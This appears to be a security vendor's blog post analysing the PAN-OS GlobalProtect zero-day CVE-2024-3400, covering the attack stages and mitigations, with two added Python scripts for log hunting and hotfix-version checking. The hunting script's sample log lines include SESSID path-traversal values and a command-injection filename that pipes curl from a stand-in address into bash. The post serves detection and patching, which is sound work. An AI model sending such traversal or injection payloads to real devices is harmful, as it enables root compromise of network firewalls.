
Anatomy of a Cyber Attack: The PAN-OS Firewall Zero-Day

Learn about CVE-2024-3400, how it was exploited, and how Arctic Wolf’s proactive security measures were able to stop the threat.

On April 12, 2024, Palo Alto Networks published a security advisory for an actively exploited zero-day vulnerability in the GlobalProtect feature of PAN-OS. Tracked as CVE-2024-3400, it received the highest possible Common Vulnerability Scoring System (CVSS) score of 10.0: the flaw is reachable over the network without authentication or user interaction, and successful exploitation gives full control of the device.

According to the Shadowserver Foundation, a nonprofit security organisation that tracks vulnerable and compromised systems on the internet, 22,542 internet-exposed firewall devices were likely vulnerable to CVE-2024-3400 at the time of disclosure.

Over the next several weeks, security teams around the country raced to mitigate the vulnerability, close gaps in their environments, and prevent or halt exploitation of the zero-day.

Vulnerabilities, whether a zero-day or a long-known one, are among the most common ways cybercriminals breach organisations, and new ones keep appearing as software changes and as attackers keep looking for new ways in. Much can be learned, then, from the way a vulnerability is revealed, how attacks leveraging it unfold, and how security teams respond.

Let’s examine the PAN-OS firewall zero-day, how it was exploited, and how Arctic Wolf’s proactive security measures were able to stop the threat actors attempting to exploit it from acting on their objectives.

What Is CVE-2024-3400, the PAN-OS Firewall Zero-Day?

CVE-2024-3400 allows an unauthenticated remote threat actor to execute arbitrary code with root privileges on the firewall. Simply put, an attacker does not have to get past the firewall at all: the firewall itself, sitting at the network edge with a view of the traffic behind it, becomes the beachhead for a larger intrusion.

This vulnerability was identified as a zero-day by Volexity, which during its investigation discovered a threat actor it tracks as UTA0218 installing a custom Python backdoor named UPSTYLE on firewall devices. Following the initial access, the threat actor downloaded additional tools from remote servers under its own control onto the compromised devices and used them to pivot deeper into victims’ internal networks.

Which Organizations are Impacted by CVE-2024-3400?

CVE-2024-3400 affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls that have a GlobalProtect gateway or portal configured. Palo Alto Networks’ advisory initially listed device telemetry as a second precondition but later revised that statement: telemetry does not need to be enabled for a device to be exploitable. Cloud NGFW, Panorama appliances, Prisma Access, and other PAN-OS versions are not affected.

Notably, this is not the first time threat actors have targeted GlobalProtect; a similar vulnerability (CVE-2019-1579) was exploited in 2019. Given its widespread use for remote access to corporate networks globally, GlobalProtect remains an enticing target for threat actors. But it’s not an issue limited to that particular security solution. Due to the widespread adoption of remote work, any tool that enables remote access to corporate networks is — and will remain — a target.

The Stages of Attack: A Typical Exploit of CVE-2024-3400

Based on insights from the Arctic Wolf Security Teams, we can create a common, if hypothetical, attack scenario leveraging the exploitation of the PAN-OS firewall zero-day vulnerability. The attack, like most cyber attacks, takes place over several stages, and becomes more complex depending on the attacker’s end game or goal. Below, we’ll explore the stages of attack, as well as mitigation techniques that can be deployed at each stage.

Reconnaissance

The first stage of any cyber attack is reconnaissance, where attackers gather information about their targets. For CVE-2024-3400, this means finding internet-facing hosts running a vulnerable GlobalProtect portal or gateway. The threat actor scans the organisation’s external address space for open ports and services, typically with a tool such as Nmap, which sends probes and analyses the responses to fingerprint what is listening. GlobalProtect is easy to spot: it answers on TCP 443 with recognisable paths such as /global-protect/login.esp, which also tells the attacker that the host is a PAN-OS device worth trying.

Mitigation:
This stage typically flies under the radar of security controls and teams, because anything connected to the internet is scanned constantly and a single reconnaissance probe is indistinguishable from that background noise. Proactive efforts that reduce what is exposed to the internet, and how much the exposed services reveal about themselves, still impede a threat actor’s ability to conduct thorough reconnaissance.

Resource Development

Once potential targets are identified, the threat actor builds a payload: a crafted request that abuses the GlobalProtect service’s handling of session IDs to create a file at an arbitrary location on the appliance, with a filename chosen so that it will later be executed as a command with root privileges.

Mitigation:
As this stage takes place outside of the target environment, there is little organisations can do to prevent or remediate a threat actor’s development of resources. However, in terms of general cyber attack prevention, proactive measures like a robust vulnerability management program, reducing the attack surface, employing an identity and access management (IAM) framework, or implementing a zero trust policy can make it more difficult for threat actors to move past reconnaissance or access your environment with the resources they’ve developed.

Initial Access

Next, the threat actor gains access to the PAN-OS firewall by sending the payload in an HTTP cookie. The GlobalProtect service stores the value of the SESSID cookie on disk as a file named after that value, without validating it first. Combined with a path traversal sequence (../ components that step out of the directory the service intended to write to), the threat actor controls not only the filename but also the directory the file lands in, and the write happens with the service’s own privileges.

Mitigation:
The malicious cookie arrives inside the same TLS session any legitimate GlobalProtect client uses, so the usual advice to encrypt remote-access traffic offers no protection here: the VPN gateway itself is the target. Preventive controls at this stage are the vendor hotfix and, where the firewall has a Threat Prevention subscription, the vulnerability signatures Palo Alto Networks released for this CVE, applied to the GlobalProtect interface. Reducing who can reach the portal and gateway (for example, restricting them to known client ranges or regions where the business allows it) shrinks the population of attackers able to deliver the payload at all. Note that the advisory’s early suggestion to disable device telemetry as an interim workaround was withdrawn once it became clear telemetry was not required for exploitation; do not rely on it.
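The SESSID indicator described above can be hunted for in the GlobalProtect service log, which is where Palo Alto Networks’ advisory pointed operators: the documented check is to grep gpsvc.log for “failed to unmarshal session” followed by a traversal sequence. The following Python is an added example, not Arctic Wolf’s or Palo Alto Networks’ code. The sample log lines are constructed approximations of that log format, and the timestamp layout, the “map , EOF” suffix, the target directory and the injected command in them are assumptions made for the demonstration.

```python
"""
Hunt for the CVE-2024-3400 arbitrary-file-create artifact in gpsvc.log.

Added example, not Arctic Wolf's or Palo Alto Networks' tooling. The lines in
SAMPLE_GPSVC_LOG are CONSTRUCTED approximations of the GlobalProtect service
log format, not captures from a real device.
"""
import posixpath
import re
from dataclasses import dataclass

# The service logs the SESSID value it could not decode, verbatim, inside
# parentheses. The pattern is greedy up to the last ')' so that payloads
# containing their own parentheses, e.g. $(...), are captured whole.
UNMARSHAL = re.compile(r"failed to unmarshal session\((?P<sessid>.*)\)")

# Shell metacharacters in the final path component indicate the attacker is
# going for the second bug (filename interpolated into a root shell command)
# rather than merely testing whether the file write works.
SHELL_META = re.compile(r"[`$;|&<>]")


@dataclass(frozen=True)
class Finding:
    line_no: int
    sessid: str              # raw cookie value as logged
    filename: str            # final path component the attacker tried to create
    command_injection: bool  # filename contains shell metacharacters


def scan_gpsvc(lines):
    """Return a Finding for every line whose SESSID value traverses directories.

    The bare "failed to unmarshal session" error also appears for malformed
    but harmless cookies, so it is not an indicator on its own; only a value
    containing a path separator (and therefore a traversal) is flagged.
    """
    findings = []
    for n, line in enumerate(lines, start=1):
        m = UNMARSHAL.search(line)
        if not m:
            continue
        sessid = m.group("sessid")
        if "/" not in sessid:
            continue
        # normpath collapses the ../ sequences the same way the filesystem
        # would, leaving the name the attacker actually wanted created.
        filename = posixpath.basename(posixpath.normpath(sessid))
        findings.append(
            Finding(n, sessid, filename, bool(SHELL_META.search(filename)))
        )
    return findings


# Constructed sample: one benign decode failure, a file-write probe, and a
# command-injection attempt (203.0.113.7 is documentation address space).
SAMPLE_GPSVC_LOG = [
    "2024-04-14 02:13:55 [Error] failed to unmarshal session(a1b2c3d4-5e6f-7890-abcd-ef1234567890) map , EOF",
    "2024-04-14 02:14:01 [Error] failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/hello) map , EOF",
    "2024-04-14 02:14:09 [Error] failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}203.0.113.7|bash`) map , EOF",
]

if __name__ == "__main__":
    for f in scan_gpsvc(SAMPLE_GPSVC_LOG):
        kind = "COMMAND INJECTION" if f.command_injection else "file-write probe"
        print(f"line {f.line_no}: {kind}: {f.filename!r}")
```

Run against a copy of the log exported from the device (or over a SIEM export of the same source) rather than alerting on the error string alone; the distinction between a harmless decode failure and a traversal is what keeps this from being noisy.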

Execution

The arbitrary file write on its own does not run anything. The second half of the chain is a periodic, privileged job on the appliance, part of the device telemetry subsystem, that picked up files from the directory the attacker wrote to and passed their names, unsanitised, into a shell command. A filename that is itself a shell snippet therefore runs as root. In the activity Volexity described, the threat actor used that execution to install a cron job that ran every minute, fetched commands from an attacker-controlled server, and executed them with the bash shell, giving a steady command channel into the device.

Mitigation:
Every device on a network, the firewall included, produces event, data, or security logs. Collecting them centrally and correlating across sources is what lets a security team see an attack at this early stage. On the appliance, session-decode errors in the GlobalProtect service log and new or modified cron entries are the telltales; on the network, a firewall making outbound requests every minute to an unfamiliar host is itself an alert-worthy anomaly.

Persistence

Thanks to Volexity’s observations, we know that in the next stage some threat actors install UPSTYLE, a custom Python backdoor, on the firewall. It hides its command channel inside the device’s own web traffic: the backdoor watches the web server’s error log for requests containing a specific pattern, executes the command embedded in them, writes the output into a file the web server serves, and restores that file shortly afterwards. The actor Volexity tracks as UTA0218 also downloaded additional tools from servers under its own control onto the compromised devices and used them to reach deeper into targets’ internal networks.

Mitigation:
Implementing the principle of least privilege (PoLP), where access to specific systems and data is limited to those with a demonstrable need, can deny threat actors the permissions they need to install a backdoor and achieve persistence. On the appliance itself this has limits, since the exploit already executes as root. Where it matters most is what the compromised firewall can reach next: keep the management interface off the internet and on a restricted network, and do not leave directory or cloud credentials on the device that grant more access than its role requires.

Next Steps

Now that the threat actor has gained access and maintained persistence, they have fully exploited the CVE-2024-3400 vulnerability and are free to carry out the next phase of their attack. Depending on the target organisation and the goals of the threat actor, this can mean anything from lateral movement to extract credentials and sensitive files, to the installation of ransomware or other malware across the environment.

Mitigation:
Network segmentation is a key factor in limiting a threat actor’s ability to move laterally through an environment, and in frustrating their attempts to obtain sensitive information or install malware.

Can CVE-2024-3400 Be Mitigated?

According to Palo Alto Networks, “this issue is fixed in PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions.” When installed, these hotfixes “completely prevent the initial remote command execution, stopping subsequent post-exploitation or persistence.”

Palo Alto Networks has also released hotfixes for other commonly deployed maintenance releases, so a firewall does not have to jump to the newest release in its train to be fixed. The company’s list:

PAN-OS 10.2:
– 10.2.9-h1 (Released 4/14/24)
– 10.2.8-h3 (Released 4/15/24)
– 10.2.7-h8 (Released 4/15/24)
– 10.2.6-h3 (Released 4/16/24)
– 10.2.5-h6 (Released 4/16/24)
– 10.2.4-h16 (Released 4/18/24)
– 10.2.3-h13 (Released 4/18/24)
– 10.2.2-h5 (Released 4/18/24)
– 10.2.1-h2 (Released 4/18/24)
– 10.2.0-h3 (Released 4/18/24)

PAN-OS 11.0:
– 11.0.4-h1 (Released 4/14/24)
– 11.0.4-h2 (Released 4/17/24)
– 11.0.3-h10 (Released 4/16/24)
– 11.0.2-h4 (Released 4/16/24)
– 11.0.1-h4 (Released 4/18/24)
– 11.0.0-h3 (Released 4/18/24)

PAN-OS 11.1:
– 11.1.2-h3 (Released 4/14/24)
– 11.1.1-h1 (Released 4/16/24)
– 11.1.0-h3 (Released 4/16/24)
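Checking a fleet against that list by eye is error-prone: a version such as 10.2.4-h15 reads as recent but is still one hotfix short. The following Python is an added example, not a Palo Alto Networks tool. It transcribes the table above and classifies a PAN-OS version string as fixed, vulnerable, or not affected; the handling of other trains and of releases newer than the list follows the two statements quoted above (“not impact ... other PAN-OS versions” and “all later PAN-OS versions”), and the sample fleet is constructed.

```python
"""
Classify a PAN-OS version string against the CVE-2024-3400 hotfix list.

Added example, not a Palo Alto Networks tool. FIXED is transcribed from the
hotfix list in the article; versions are compared as
(major, minor, maintenance, hotfix) with a missing "-hN" suffix counting as
hotfix 0, so "10.2.9" is older than "10.2.9-h1".
"""
import re

# maintenance release -> first hotfix number that contains the fix
FIXED = {
    "10.2.9": 1, "10.2.8": 3, "10.2.7": 8, "10.2.6": 3, "10.2.5": 6,
    "10.2.4": 16, "10.2.3": 13, "10.2.2": 5, "10.2.1": 2, "10.2.0": 3,
    "11.0.4": 1, "11.0.3": 10, "11.0.2": 4, "11.0.1": 4, "11.0.0": 3,
    "11.1.2": 3, "11.1.1": 1, "11.1.0": 3,
}
AFFECTED_TRAINS = ("10.2", "11.0", "11.1")
LAST_AFFECTED_TRAIN = (11, 1)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text):
    """'11.1.2-h3' -> (11, 1, 2, 3); '10.2.9' -> (10, 2, 9, 0)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def assess(text):
    """Return 'fixed', 'vulnerable' or 'not affected' for one version string."""
    major, minor, maint, hotfix = parse_version(text)
    train = f"{major}.{minor}"
    if (major, minor) > LAST_AFFECTED_TRAIN:
        return "fixed"           # "and in all later PAN-OS versions"
    if train not in AFFECTED_TRAINS:
        return "not affected"    # 10.1, 9.1, ... were never vulnerable
    base = f"{train}.{maint}"
    if base in FIXED:
        return "fixed" if hotfix >= FIXED[base] else "vulnerable"
    # A maintenance release newer than every listed one in this train ships
    # with the fix; an unlisted older one is treated as vulnerable so the
    # check fails closed rather than silently passing an odd version.
    newest_listed = max(
        int(b.rsplit(".", 1)[1]) for b in FIXED if b.startswith(train + ".")
    )
    return "fixed" if maint > newest_listed else "vulnerable"


def triage(versions):
    """Group a fleet's version strings by assessment, e.g. for a patch report."""
    report = {"fixed": [], "vulnerable": [], "not affected": []}
    for v in versions:
        report[assess(v)].append(v)
    return report


if __name__ == "__main__":
    # Constructed sample fleet for the demonstration.
    sample = ["10.2.9-h1", "10.2.9", "10.2.4-h15", "11.0.4-h2", "11.1.3", "10.1.9-h3"]
    for status, hosts in triage(sample).items():
        print(f"{status:>12}: {', '.join(hosts) or '-'}")
```

Feed it the version strings from Panorama or from each device’s “show system info” output; anything it reports as vulnerable needs the hotfix regardless of whether GlobalProtect is currently in use, since the service only has to be configured, not busy, to be reachable.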

How Arctic Wolf Prevented Exploitation of CVE-2024-3400

The PAN-OS firewall zero-day was so globally impactful that it led Arctic Wolf to coin a new term: “Mega Threat Event.” Previous threat events that would fall into this category include SolarWinds, Log4j, and Spring4Shell. During a mega event, Arctic Wolf executes a strategic runbook designed to minimise the impact on our customer base.

This runbook combines active investigation and response with a high-touch customer approach that provides updates and actionable intelligence.

As soon as the vulnerability was announced, Arctic Wolf implemented our mega event runbook, informing all customers with a Palo Alto firewall appliance of the situation, advising them on their risk status, and guiding them through mitigation steps. Patch guidance was issued and discussed with customers, and any customer at risk was continually monitored for indicators of compromise (IOCs).

During this event, Arctic Wolf:

  • Executed a 96-hour response timeline
  • Issued three security bulletins
  • Contacted 1,800 customers
  • Conducted 171 security investigations
  • Developed seven new threat detections to identify potential instances of vulnerability exploitation and typical post-compromise activities
  • Thwarted 13 active attacks against a single customer in a single day

Most importantly, zero cases of ransomware or data exfiltration were identified, because the attacks were stopped early enough in the kill chain to prevent threat actors from acting on their objectives.

Stopping Cyber Attacks with Security Operations

Organisations that embrace security operations are more secure, more resilient, and better able to adapt to the ever-evolving threat landscape, but the reality is that very few organisations have the resources to build such capabilities in house.

The Arctic Wolf® Platform processes over five trillion events per week, enriching them with threat intelligence and risk context to drive faster threat detection, simplify incident response, and eliminate alert fatigue. By leveraging an array of detection methodologies, including AI-powered machine learning, as well as custom detection rules created specifically for your environment, our expert Security Teams deliver unique, personalized proactive and reactive protection for your organisation against modern cyber threats.

Security outcomes we deliver to our customers through this process include:

  • The Arctic Wolf Platform reduces data by 99.999999% before an alert is issued
  • We maintain a true positive rate of 99.9%, helping customers make informed decisions while eliminating alert fatigue
  • On average, a typical customer receives one alert per day from Arctic Wolf
  • When appropriate, Arctic Wolf will respond by containing and mitigating an active threat

In short, Arctic Wolf helps level the playing field against attackers, ensuring that every organisation of every size has the expertise and foundational cybersecurity needed to defend itself.

Gain a comprehensive view of the threats against your own organisation, plus actionable ideas on how to reduce your own cyber risk in the Arctic Wolf 2024 Security Operations Report.
